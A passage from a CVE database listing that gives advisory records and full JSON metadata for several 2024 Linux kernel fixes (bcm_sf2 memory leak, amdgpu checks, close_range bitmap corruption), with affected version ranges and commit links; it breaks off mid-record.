In the Linux kernel, the following vulnerability has been resolved: net: dsa: bcm_sf2: Fix a possible memory leak in bcm_sf2_mdio_register() bcm_sf2_mdio_register() calls of_phy_find_device() and then phy_device_remove() in a loop to remove existing PHY devices. of_phy_find_device() eventually calls bus_find_device(), which calls get_device() on the returned struct device * to increment the refcount. The current implementation does not decrement the refcount, which causes memory leak. This commit adds the missing phy_device_free() call to decrement the refcount via put_device() to balance the refcount.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/b7b8d9f5e679af60c…
	https://git.kernel.org/stable/c/c05516c072903f6fb…
	https://git.kernel.org/stable/c/7feef10768ea71d46…
	https://git.kernel.org/stable/c/a7d2808d67570e6ac…
	https://git.kernel.org/stable/c/f3d5efe18a11f9415…
	https://git.kernel.org/stable/c/e3862093ee93fcfbd…

Impacted products

Vendor

Product

Version

Linux

Affected: 771089c2a485958e423f305e974303760167b45c , < b7b8d9f5e679af60c94251fd6728dde34be69a71 (git)
Affected: 771089c2a485958e423f305e974303760167b45c , < c05516c072903f6fb9134b8e7e1ad4bffcdc4819 (git)
Affected: 771089c2a485958e423f305e974303760167b45c , < 7feef10768ea71d468d9bbc1e0d14c461876768c (git)
Affected: 771089c2a485958e423f305e974303760167b45c , < a7d2808d67570e6acae45c2a96e0d59986888e4c (git)
Affected: 771089c2a485958e423f305e974303760167b45c , < f3d5efe18a11f94150fee8b3fda9d62079af640a (git)
Affected: 771089c2a485958e423f305e974303760167b45c , < e3862093ee93fcfbdadcb7957f5f8974fffa806a (git)

Linux

Affected: 5.10
Unaffected: 0 , < 5.10 (semver)
Unaffected: 5.10.224 , ≤ 5.10.* (semver)
Unaffected: 5.15.165 , ≤ 5.15.* (semver)
Unaffected: 6.1.105 , ≤ 6.1.* (semver)
Unaffected: 6.6.46 , ≤ 6.6.* (semver)
Unaffected: 6.10.5 , ≤ 6.10.* (semver)
Unaffected: 6.11 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-44971",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T17:39:14.220470Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-12T17:33:34.543Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T22:14:24.044Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2024/10/msg00003.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/net/dsa/bcm_sf2.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "b7b8d9f5e679af60c94251fd6728dde34be69a71",
              "status": "affected",
              "version": "771089c2a485958e423f305e974303760167b45c",
              "versionType": "git"
            },
            {
              "lessThan": "c05516c072903f6fb9134b8e7e1ad4bffcdc4819",
              "status": "affected",
              "version": "771089c2a485958e423f305e974303760167b45c",
              "versionType": "git"
            },
            {
              "lessThan": "7feef10768ea71d468d9bbc1e0d14c461876768c",
              "status": "affected",
              "version": "771089c2a485958e423f305e974303760167b45c",
              "versionType": "git"
            },
            {
              "lessThan": "a7d2808d67570e6acae45c2a96e0d59986888e4c",
              "status": "affected",
              "version": "771089c2a485958e423f305e974303760167b45c",
              "versionType": "git"
            },
            {
              "lessThan": "f3d5efe18a11f94150fee8b3fda9d62079af640a",
              "status": "affected",
              "version": "771089c2a485958e423f305e974303760167b45c",
              "versionType": "git"
            },
            {
              "lessThan": "e3862093ee93fcfbdadcb7957f5f8974fffa806a",
              "status": "affected",
              "version": "771089c2a485958e423f305e974303760167b45c",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/net/dsa/bcm_sf2.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "5.10"
            },
            {
              "lessThan": "5.10",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.224",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.165",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.105",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.46",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.10.*",
              "status": "unaffected",
              "version": "6.10.5",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.11",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.224",
                  "versionStartIncluding": "5.10",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.165",
                  "versionStartIncluding": "5.10",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.105",
                  "versionStartIncluding": "5.10",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.46",
                  "versionStartIncluding": "5.10",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10.5",
                  "versionStartIncluding": "5.10",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.11",
                  "versionStartIncluding": "5.10",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: dsa: bcm_sf2: Fix a possible memory leak in bcm_sf2_mdio_register()\n\nbcm_sf2_mdio_register() calls of_phy_find_device() and then\nphy_device_remove() in a loop to remove existing PHY devices.\nof_phy_find_device() eventually calls bus_find_device(), which calls\nget_device() on the returned struct device * to increment the refcount.\nThe current implementation does not decrement the refcount, which causes\nmemory leak.\n\nThis commit adds the missing phy_device_free() call to decrement the\nrefcount via put_device() to balance the refcount."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:30:03.677Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/b7b8d9f5e679af60c94251fd6728dde34be69a71"
        },
        {
          "url": "https://git.kernel.org/stable/c/c05516c072903f6fb9134b8e7e1ad4bffcdc4819"
        },
        {
          "url": "https://git.kernel.org/stable/c/7feef10768ea71d468d9bbc1e0d14c461876768c"
        },
        {
          "url": "https://git.kernel.org/stable/c/a7d2808d67570e6acae45c2a96e0d59986888e4c"
        },
        {
          "url": "https://git.kernel.org/stable/c/f3d5efe18a11f94150fee8b3fda9d62079af640a"
        },
        {
          "url": "https://git.kernel.org/stable/c/e3862093ee93fcfbdadcb7957f5f8974fffa806a"
        }
      ],
      "title": "net: dsa: bcm_sf2: Fix a possible memory leak in bcm_sf2_mdio_register()",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-44971",
    "datePublished": "2024-09-04T18:56:47.475Z",
    "dateReserved": "2024-08-21T05:34:56.669Z",
    "dateUpdated": "2025-11-03T22:14:24.044Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-46817 (GCVE-0-2024-46817)

Vulnerability from cvelistv5 – Published: 2024-09-27 12:35 – Updated: 2025-11-03 22:19

Title

drm/amd/display: Stop amdgpu_dm initialize when stream nums greater than 6

Summary

In the Linux kernel, the following vulnerability has been resolved: drm/amd/display: Stop amdgpu_dm initialize when stream nums greater than 6 [Why] Coverity reports OVERRUN warning. Should abort amdgpu_dm initialize. [How] Return failure to amdgpu_dm_init.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/d619b91d3c4af60ac…
	https://git.kernel.org/stable/c/754321ed63f0a4a31…
	https://git.kernel.org/stable/c/21bbb39863f10f5fb…
	https://git.kernel.org/stable/c/28b515c458aa9c92b…
	https://git.kernel.org/stable/c/94cb77700fa4ae620…
	https://git.kernel.org/stable/c/d398c74c881dee695…
	https://git.kernel.org/stable/c/84723eb6068c50610…

Impacted products

Vendor

Product

Version

Linux

Affected: 4562236b3bc0a28aeb6ee93b2d8a849a4c4e1c7c , < d619b91d3c4af60ac422f1763ce53d721fb91262 (git)
Affected: 4562236b3bc0a28aeb6ee93b2d8a849a4c4e1c7c , < 754321ed63f0a4a31252ca72e0bd89a9e1888018 (git)
Affected: 4562236b3bc0a28aeb6ee93b2d8a849a4c4e1c7c , < 21bbb39863f10f5fb4bf772d15b07d5d13590e9d (git)
Affected: 4562236b3bc0a28aeb6ee93b2d8a849a4c4e1c7c , < 28b515c458aa9c92bfcb99884c94713a5f471cea (git)
Affected: 4562236b3bc0a28aeb6ee93b2d8a849a4c4e1c7c , < 94cb77700fa4ae6200486bfa0ba2ac547534afd2 (git)
Affected: 4562236b3bc0a28aeb6ee93b2d8a849a4c4e1c7c , < d398c74c881dee695f6eb6138c9891644e1c3d9d (git)
Affected: 4562236b3bc0a28aeb6ee93b2d8a849a4c4e1c7c , < 84723eb6068c50610c5c0893980d230d7afa2105 (git)

Linux

Affected: 4.15
Unaffected: 0 , < 4.15 (semver)
Unaffected: 5.4.284 , ≤ 5.4.* (semver)
Unaffected: 5.10.226 , ≤ 5.10.* (semver)
Unaffected: 5.15.167 , ≤ 5.15.* (semver)
Unaffected: 6.1.109 , ≤ 6.1.* (semver)
Unaffected: 6.6.50 , ≤ 6.6.* (semver)
Unaffected: 6.10.9 , ≤ 6.10.* (semver)
Unaffected: 6.11 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-46817",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-29T14:15:16.825068Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-29T14:15:54.377Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T22:19:02.205Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2024/10/msg00003.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "d619b91d3c4af60ac422f1763ce53d721fb91262",
              "status": "affected",
              "version": "4562236b3bc0a28aeb6ee93b2d8a849a4c4e1c7c",
              "versionType": "git"
            },
            {
              "lessThan": "754321ed63f0a4a31252ca72e0bd89a9e1888018",
              "status": "affected",
              "version": "4562236b3bc0a28aeb6ee93b2d8a849a4c4e1c7c",
              "versionType": "git"
            },
            {
              "lessThan": "21bbb39863f10f5fb4bf772d15b07d5d13590e9d",
              "status": "affected",
              "version": "4562236b3bc0a28aeb6ee93b2d8a849a4c4e1c7c",
              "versionType": "git"
            },
            {
              "lessThan": "28b515c458aa9c92bfcb99884c94713a5f471cea",
              "status": "affected",
              "version": "4562236b3bc0a28aeb6ee93b2d8a849a4c4e1c7c",
              "versionType": "git"
            },
            {
              "lessThan": "94cb77700fa4ae6200486bfa0ba2ac547534afd2",
              "status": "affected",
              "version": "4562236b3bc0a28aeb6ee93b2d8a849a4c4e1c7c",
              "versionType": "git"
            },
            {
              "lessThan": "d398c74c881dee695f6eb6138c9891644e1c3d9d",
              "status": "affected",
              "version": "4562236b3bc0a28aeb6ee93b2d8a849a4c4e1c7c",
              "versionType": "git"
            },
            {
              "lessThan": "84723eb6068c50610c5c0893980d230d7afa2105",
              "status": "affected",
              "version": "4562236b3bc0a28aeb6ee93b2d8a849a4c4e1c7c",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "4.15"
            },
            {
              "lessThan": "4.15",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.284",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.226",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.167",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.109",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.50",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.10.*",
              "status": "unaffected",
              "version": "6.10.9",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.11",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.284",
                  "versionStartIncluding": "4.15",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.226",
                  "versionStartIncluding": "4.15",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.167",
                  "versionStartIncluding": "4.15",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.109",
                  "versionStartIncluding": "4.15",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.50",
                  "versionStartIncluding": "4.15",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10.9",
                  "versionStartIncluding": "4.15",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.11",
                  "versionStartIncluding": "4.15",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/amd/display: Stop amdgpu_dm initialize when stream nums greater than 6\n\n[Why]\nCoverity reports OVERRUN warning. Should abort amdgpu_dm\ninitialize.\n\n[How]\nReturn failure to amdgpu_dm_init."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-07-11T17:20:42.051Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/d619b91d3c4af60ac422f1763ce53d721fb91262"
        },
        {
          "url": "https://git.kernel.org/stable/c/754321ed63f0a4a31252ca72e0bd89a9e1888018"
        },
        {
          "url": "https://git.kernel.org/stable/c/21bbb39863f10f5fb4bf772d15b07d5d13590e9d"
        },
        {
          "url": "https://git.kernel.org/stable/c/28b515c458aa9c92bfcb99884c94713a5f471cea"
        },
        {
          "url": "https://git.kernel.org/stable/c/94cb77700fa4ae6200486bfa0ba2ac547534afd2"
        },
        {
          "url": "https://git.kernel.org/stable/c/d398c74c881dee695f6eb6138c9891644e1c3d9d"
        },
        {
          "url": "https://git.kernel.org/stable/c/84723eb6068c50610c5c0893980d230d7afa2105"
        }
      ],
      "title": "drm/amd/display: Stop amdgpu_dm initialize when stream nums greater than 6",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-46817",
    "datePublished": "2024-09-27T12:35:58.517Z",
    "dateReserved": "2024-09-11T15:12:18.284Z",
    "dateUpdated": "2025-11-03T22:19:02.205Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-46807 (GCVE-0-2024-46807)

Vulnerability from cvelistv5 – Published: 2024-09-27 12:35 – Updated: 2025-11-03 22:18

Title

drm/amd/amdgpu: Check tbo resource pointer

Summary

In the Linux kernel, the following vulnerability has been resolved: drm/amd/amdgpu: Check tbo resource pointer Validate tbo resource pointer, skip if NULL

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/e55e3904ffeaff817…
	https://git.kernel.org/stable/c/2be1eb6304d9623ba…
	https://git.kernel.org/stable/c/4dfec5f5501a27e0a…
	https://git.kernel.org/stable/c/e8765364d4f3aaf88…
	https://git.kernel.org/stable/c/6cd2b872643bb29bb…

Impacted products

Vendor

Product

Version

Linux

Affected: 403009bfba45163887398652762ed1fc6645181c , < e55e3904ffeaff81715256a711b1a61f4ad5258a (git)
Affected: 403009bfba45163887398652762ed1fc6645181c , < 2be1eb6304d9623ba21dd6f3e68ffb753a759635 (git)
Affected: 403009bfba45163887398652762ed1fc6645181c , < 4dfec5f5501a27e0a0da00e136d65ef9011ded4c (git)
Affected: 403009bfba45163887398652762ed1fc6645181c , < e8765364d4f3aaf88c7abe0a4fc99089d059ab49 (git)
Affected: 403009bfba45163887398652762ed1fc6645181c , < 6cd2b872643bb29bba01a8ac739138db7bd79007 (git)

Linux

Affected: 4.20
Unaffected: 0 , < 4.20 (semver)
Unaffected: 5.15.167 , ≤ 5.15.* (semver)
Unaffected: 6.1.109 , ≤ 6.1.* (semver)
Unaffected: 6.6.50 , ≤ 6.6.* (semver)
Unaffected: 6.10.9 , ≤ 6.10.* (semver)
Unaffected: 6.11 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-46807",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-29T14:19:59.164290Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-29T14:20:11.695Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T22:18:50.504Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/gpu/drm/amd/amdgpu/amdgpu_device.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "e55e3904ffeaff81715256a711b1a61f4ad5258a",
              "status": "affected",
              "version": "403009bfba45163887398652762ed1fc6645181c",
              "versionType": "git"
            },
            {
              "lessThan": "2be1eb6304d9623ba21dd6f3e68ffb753a759635",
              "status": "affected",
              "version": "403009bfba45163887398652762ed1fc6645181c",
              "versionType": "git"
            },
            {
              "lessThan": "4dfec5f5501a27e0a0da00e136d65ef9011ded4c",
              "status": "affected",
              "version": "403009bfba45163887398652762ed1fc6645181c",
              "versionType": "git"
            },
            {
              "lessThan": "e8765364d4f3aaf88c7abe0a4fc99089d059ab49",
              "status": "affected",
              "version": "403009bfba45163887398652762ed1fc6645181c",
              "versionType": "git"
            },
            {
              "lessThan": "6cd2b872643bb29bba01a8ac739138db7bd79007",
              "status": "affected",
              "version": "403009bfba45163887398652762ed1fc6645181c",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/gpu/drm/amd/amdgpu/amdgpu_device.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "4.20"
            },
            {
              "lessThan": "4.20",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.167",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.109",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.50",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.10.*",
              "status": "unaffected",
              "version": "6.10.9",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.11",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.167",
                  "versionStartIncluding": "4.20",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.109",
                  "versionStartIncluding": "4.20",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.50",
                  "versionStartIncluding": "4.20",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10.9",
                  "versionStartIncluding": "4.20",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.11",
                  "versionStartIncluding": "4.20",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/amd/amdgpu: Check tbo resource pointer\n\nValidate tbo resource pointer, skip if NULL"
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-21T09:13:15.151Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/e55e3904ffeaff81715256a711b1a61f4ad5258a"
        },
        {
          "url": "https://git.kernel.org/stable/c/2be1eb6304d9623ba21dd6f3e68ffb753a759635"
        },
        {
          "url": "https://git.kernel.org/stable/c/4dfec5f5501a27e0a0da00e136d65ef9011ded4c"
        },
        {
          "url": "https://git.kernel.org/stable/c/e8765364d4f3aaf88c7abe0a4fc99089d059ab49"
        },
        {
          "url": "https://git.kernel.org/stable/c/6cd2b872643bb29bba01a8ac739138db7bd79007"
        }
      ],
      "title": "drm/amd/amdgpu: Check tbo resource pointer",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-46807",
    "datePublished": "2024-09-27T12:35:51.815Z",
    "dateReserved": "2024-09-11T15:12:18.282Z",
    "dateUpdated": "2025-11-03T22:18:50.504Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-45025 (GCVE-0-2024-45025)

Vulnerability from cvelistv5 – Published: 2024-09-11 15:13 – Updated: 2025-11-03 22:15

Title

fix bitmap corruption on close_range() with CLOSE_RANGE_UNSHARE

Summary

In the Linux kernel, the following vulnerability has been resolved: fix bitmap corruption on close_range() with CLOSE_RANGE_UNSHARE copy_fd_bitmaps(new, old, count) is expected to copy the first count/BITS_PER_LONG bits from old->full_fds_bits[] and fill the rest with zeroes. What it does is copying enough words (BITS_TO_LONGS(count/BITS_PER_LONG)), then memsets the rest. That works fine, *if* all bits past the cutoff point are clear. Otherwise we are risking garbage from the last word we'd copied. For most of the callers that is true - expand_fdtable() has count equal to old->max_fds, so there's no open descriptors past count, let alone fully occupied words in ->open_fds[], which is what bits in ->full_fds_bits[] correspond to. The other caller (dup_fd()) passes sane_fdtable_size(old_fdt, max_fds), which is the smallest multiple of BITS_PER_LONG that covers all opened descriptors below max_fds. In the common case (copying on fork()) max_fds is ~0U, so all opened descriptors will be below it and we are fine, by the same reasons why the call in expand_fdtable() is safe. Unfortunately, there is a case where max_fds is less than that and where we might, indeed, end up with junk in ->full_fds_bits[] - close_range(from, to, CLOSE_RANGE_UNSHARE) with * descriptor table being currently shared * 'to' being above the current capacity of descriptor table * 'from' being just under some chunk of opened descriptors. In that case we end up with observably wrong behaviour - e.g. spawn a child with CLONE_FILES, get all descriptors in range 0..127 open, then close_range(64, ~0U, CLOSE_RANGE_UNSHARE) and watch dup(0) ending up with descriptor #128, despite #64 being observably not open. The minimally invasive fix would be to deal with that in dup_fd(). If this proves to add measurable overhead, we can go that way, but let's try to fix copy_fd_bitmaps() first. * new helper: bitmap_copy_and_expand(to, from, bits_to_copy, size). * make copy_fd_bitmaps() take the bitmap size in words, rather than bits; it's 'count' argument is always a multiple of BITS_PER_LONG, so we are not losing any information, and that way we can use the same helper for all three bitmaps - compiler will see that count is a multiple of BITS_PER_LONG for the large ones, so it'll generate plain memcpy()+memset(). Reproducer added to tools/testing/selftests/core/close_range_test.c

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/fe5bf14881701119a…
	https://git.kernel.org/stable/c/5053581fe5dfb09b5…
	https://git.kernel.org/stable/c/8cad3b2b3ab81ca55…
	https://git.kernel.org/stable/c/dd72ae8b0fce9c0bb…
	https://git.kernel.org/stable/c/c69d18f0ac7060de7…
	https://git.kernel.org/stable/c/9a2fa1472083580b6…

Impacted products

Vendor

Product

Version

Linux

Affected: 278a5fbaed89dacd04e9d052f4594ffd0e0585de , < fe5bf14881701119aeeda7cf685f3c226c7380df (git)
Affected: 278a5fbaed89dacd04e9d052f4594ffd0e0585de , < 5053581fe5dfb09b58c65dd8462bf5dea71f41ff (git)
Affected: 278a5fbaed89dacd04e9d052f4594ffd0e0585de , < 8cad3b2b3ab81ca55f37405ffd1315bcc2948058 (git)
Affected: 278a5fbaed89dacd04e9d052f4594ffd0e0585de , < dd72ae8b0fce9c0bbe9582b9b50820f0407f8d8a (git)
Affected: 278a5fbaed89dacd04e9d052f4594ffd0e0585de , < c69d18f0ac7060de724511537810f10f29a27958 (git)
Affected: 278a5fbaed89dacd04e9d052f4594ffd0e0585de , < 9a2fa1472083580b6c66bdaf291f591e1170123a (git)

Linux

Affected: 5.9
Unaffected: 0 , < 5.9 (semver)
Unaffected: 5.10.225 , ≤ 5.10.* (semver)
Unaffected: 5.15.166 , ≤ 5.15.* (semver)
Unaffected: 6.1.107 , ≤ 6.1.* (semver)
